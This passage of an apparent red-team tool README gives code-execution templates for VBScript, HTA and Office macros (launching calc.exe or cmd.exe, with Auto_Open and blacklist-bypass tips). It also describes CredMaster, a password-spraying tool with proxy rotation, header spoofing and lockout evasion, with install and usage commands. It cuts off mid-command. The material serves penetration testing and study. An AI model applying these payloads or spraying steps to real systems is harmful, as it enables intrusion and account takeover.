src=\"https://private-user-images.githubusercontent.com/100603074/238468558-41b424f3-053c-440b-b0fd-235e95980d9a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NTU4LTQxYjQyNGYzLTA1M2MtNDQwYi1iMGZkLTIzNWU5NTk4MGQ5YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZTYxYTllMzM4YjQ0YzFhMGQ4YWFiNDI4Zjk5MzVmNWE0NGYwYzIwZGVjZTc0NzQxNjEwNDMyNjM2NTIxYzlhJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.HDIb4rJn4kmn4hW2vKSlOm3SUxbcrQBmaXn9ic-uDBE\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"http://undocumented.ntinternals.net/\" rel=\"nofollow\"\u003ehttp://undocumented.ntinternals.net/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://codemachine.com/articles/kernel_callback_functions.html\" rel=\"nofollow\"\u003eKernel Callback Functions\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-kernel-callback-functions\" class=\"anchor\" aria-label=\"Permalink: 🔙Kernel Callback Functions\" href=\"#kernel-callback-functions\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 
2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis technical note provides a comprehensive list of all the APIs exported by the Windows kernel that driver writers use to register callback routines, which kernel components invoke under various circumstances.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eMost of these routines are documented in the Windows Driver Kit (WDK), but some of them are undocumented and intended only for use by in-box drivers.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe undocumented functions are described briefly, whereas the documented ones are just listed for reference. For red team work these registration APIs are the same hooks that EDR/AV kernel drivers rely on to observe system activity, so the list is a useful map of what an endpoint sensor can see.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eVisit \u003ca href=\"https://codemachine.com/articles/kernel_callback_functions.html\" rel=\"nofollow\"\u003ehttps://codemachine.com/articles/kernel_callback_functions.html\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" 
href=\"https://private-user-images.githubusercontent.com/100603074/238468952-b7532b7d-1abc-4af6-be92-f6f78d24a788.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4OTUyLWI3NTMyYjdkLTFhYmMtNGFmNi1iZTkyLWY2Zjc4ZDI0YTc4OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MzAxMThiZmJiNThjODRlNjhhZjg0MGIxNTA1NjM2NzUwYjM5OWI3M2ExMWVjOTVhNGNmZWZiMjUyYWI5ODU1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.Tt9OQSD5FulZC8wa8jzvl6vNGV4xwPqdbJk50WUnNLA\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/238468952-b7532b7d-1abc-4af6-be92-f6f78d24a788.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4OTUyLWI3NTMyYjdkLTFhYmMtNGFmNi1iZTkyLWY2Zjc4ZDI0YTc4OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MzAxMThiZmJiNThjODRlNjhhZjg0MGIxNTA1NjM2NzUwYjM5OWI3M2ExMWVjOTVhNGNmZWZiMjUyYWI5ODU1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.Tt9OQSD5FulZC8wa8jzvl6vNGV4xwPqdbJk50WUnNLA\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://codemachine.com\" rel=\"nofollow\"\u003ehttps://codemachine.com\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca 
href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/S3cur3Th1sSh1t/OffensiveVBA\"\u003eOffensiveVBA\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-offensivevba\" class=\"anchor\" aria-label=\"Permalink: 🔙OffensiveVBA\" href=\"#offensivevba\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA collection of offensive techniques, scripts and useful links for achieving code execution and defense evasion via office macros.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eVisit \u003ca href=\"https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo\"\u003ehttps://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" 
href=\"https://private-user-images.githubusercontent.com/100603074/238468760-7f7ad942-48d7-42e7-a3cc-55ec84139058.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NzYwLTdmN2FkOTQyLTQ4ZDctNDJlNy1hM2NjLTU1ZWM4NDEzOTA1OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iMTY4YjI3NzE5NTUxMmIxZjM1NzA4ODQ3NWJmZWY1Zjc3ZGJkYjlkYmM3ZjA4M2VjNThkZjEwMWNmYjU0YzE0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.a3c8B_beIWc5ltk0GN7Mcfmkgsbb2DJtWxEGwUvg1sA\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/238468760-7f7ad942-48d7-42e7-a3cc-55ec84139058.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NzYwLTdmN2FkOTQyLTQ4ZDctNDJlNy1hM2NjLTU1ZWM4NDEzOTA1OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iMTY4YjI3NzE5NTUxMmIxZjM1NzA4ODQ3NWJmZWY1Zjc3ZGJkYjlkYmM3ZjA4M2VjNThkZjEwMWNmYjU0YzE0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.a3c8B_beIWc5ltk0GN7Mcfmkgsbb2DJtWxEGwUvg1sA\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/S3cur3Th1sSh1t\"\u003ehttps://github.com/S3cur3Th1sSh1t\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca 
href=\"#tool-list\"\u003e🔙\u003c/a\u003eWSH\u003c/h3\u003e\u003ca id=\"user-content-wsh\" class=\"anchor\" aria-label=\"Permalink: 🔙WSH\" href=\"#wsh\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCreating payload:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-vbnet notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Set shell = WScript.CreateObject(\u0026quot;Wscript.Shell\u0026quot;)\nshell.Run(\u0026quot;C:\\Windows\\System32\\calc.exe \u0026quot; \u0026amp; WScript.ScriptFullName),0,True\"\u003e\u003cpre\u003e\u003cspan class=\"pl-k\"\u003eSet\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003eshell\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003e=\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003eWScript.CreateObject(\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"Wscript.Shell\"\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e)\u003c/span\u003e\n\u003cspan class=\"pl-smi\"\u003eshell.Run(\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e\"C:\\Windows\\System32\\calc.exe \"\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003e\u0026amp;\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003eWScript.ScriptFullName),\u003c/span\u003e\u003cspan 
class=\"pl-s\"\u003e0\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e,\u003c/span\u003e\u003cspan class=\"pl-k\"\u003eTrue\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eExecute:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"wscript payload.vbs\ncscript.exe payload.vbs\nwscript /e:VBScript payload.txt //If .vbs files are blacklisted\"\u003e\u003cpre\u003ewscript payload.vbs\ncscript.exe payload.vbs\nwscript /e:VBScript payload.txt //If .vbs files are blacklisted\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eHTA\u003c/h3\u003e\u003ca id=\"user-content-hta\" class=\"anchor\" aria-label=\"Permalink: 🔙HTA\" href=\"#hta\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCreating payload:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-text-html-basic notranslate position-relative overflow-auto\" dir=\"auto\" 
data-snippet-clipboard-copy-content=\"\u0026lt;html\u0026gt;\n\u0026lt;body\u0026gt;\n\u0026lt;script\u0026gt;\n\tvar c= 'cmd.exe'\n\tnew ActiveXObject('WScript.Shell').Run(c);\n\u0026lt;/script\u0026gt;\n\u0026lt;/body\u0026gt;\n\u0026lt;/html\u0026gt;\"\u003e\u003cpre\u003e\u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ehtml\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n\u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ebody\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n\u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003escript\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n\t\u003cspan class=\"pl-k\"\u003evar\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003ec\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e'cmd.exe'\u003c/span\u003e\n\t\u003cspan class=\"pl-k\"\u003enew\u003c/span\u003e \u003cspan class=\"pl-v\"\u003eActiveXObject\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s\"\u003e'WScript.Shell'\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e.\u003c/span\u003e\u003cspan class=\"pl-en\"\u003eRun\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e(\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ec\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e)\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e;\u003c/span\u003e\n\u003cspan class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003escript\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n\u003cspan class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ebody\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n\u003cspan 
class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ehtml\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eExecute:\u003c/strong\u003e Run file\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eVBA\u003c/h3\u003e\u003ca id=\"user-content-vba\" class=\"anchor\" aria-label=\"Permalink: 🔙VBA\" href=\"#vba\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCreating payload:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Sub calc()\n\tDim payload As String\n\tpayload = \u0026quot;calc.exe\u0026quot;\n\tCreateObject(\u0026quot;Wscript.Shell\u0026quot;).Run payload,0\nEnd Sub\"\u003e\u003cpre\u003e\u003cspan class=\"pl-v\"\u003eSub\u003c/span\u003e \u003cspan class=\"pl-en\"\u003ecalc\u003c/span\u003e()\n\t\u003cspan class=\"pl-v\"\u003eDim\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003epayload\u003c/span\u003e \u003cspan 
class=\"pl-v\"\u003eAs\u003c/span\u003e \u003cspan class=\"pl-v\"\u003eString\u003c/span\u003e\n\t\u003cspan class=\"pl-s1\"\u003epayload\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e=\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\"calc.exe\"\u003c/span\u003e\n\t\u003cspan class=\"pl-en\"\u003eCreateObject\u003c/span\u003e(\u003cspan class=\"pl-s\"\u003e\"Wscript.Shell\"\u003c/span\u003e).\u003cspan class=\"pl-c1\"\u003eRun\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003epayload\u003c/span\u003e,\u003cspan class=\"pl-c1\"\u003e0\u003c/span\u003e\n\u003cspan class=\"pl-v\"\u003eEnd\u003c/span\u003e \u003cspan class=\"pl-v\"\u003eSub\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eExecute:\u003c/strong\u003e Rename the Sub to Auto_Open() in a macro-enabled document so it runs when the file is opened. It still requires the victim to enable macros, and current Office versions block macros by default in files downloaded from the internet (Mark-of-the-Web).\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eInitial Access\u003c/h1\u003e\u003ca id=\"user-content-initial-access\" class=\"anchor\" aria-label=\"Permalink: Initial Access\" href=\"#initial-access\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca 
href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/knavesec/CredMaster\"\u003eCredMaster\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-credmaster\" class=\"anchor\" aria-label=\"Permalink: 🔙CredMaster\" href=\"#credmaster\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eLaunch a password spray / brute force attack via Amazon AWS passthrough proxies, shifting the requesting IP address for every authentication attempt. This dynamically creates FireProx APIs for more evasive password sprays. Note that the rotation only changes the source IP seen by the target: the AWS account that creates the proxy APIs remains attributable, so use a dedicated, least-privilege IAM user for the engagement and delete the generated APIs when you are done.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCredMaster provides a method of running anonymous password sprays against endpoints in a simple, easy to use tool. 
The FireProx tool provides the rotating request IP, while the base of CredMaster spoofs all other identifying information.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFeatures:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eFully supports all AWS Regions\u003c/li\u003e\n\u003cli\u003eAutomatically generates APIs for proxy pass-through\u003c/li\u003e\n\u003cli\u003eSpoofs API tracking numbers, forwarded-for IPs, and other proxy tracking headers\u003c/li\u003e\n\u003cli\u003eMulti-threaded processing\u003c/li\u003e\n\u003cli\u003ePassword delay counters \u0026amp; configuration for lockout policy evasion\u003c/li\u003e\n\u003cli\u003eEasily add new plugins\u003c/li\u003e\n\u003cli\u003eFully anonymous\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/knavesec/CredMaster;cd CredMaster;pip install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/knavesec/CredMaster\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e CredMaster\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003epip install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full installation instructions see \u003ca href=\"https://whynotsecurity.com/blog/credmaster/#setup\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs}\npython3 credmaster.py --config 
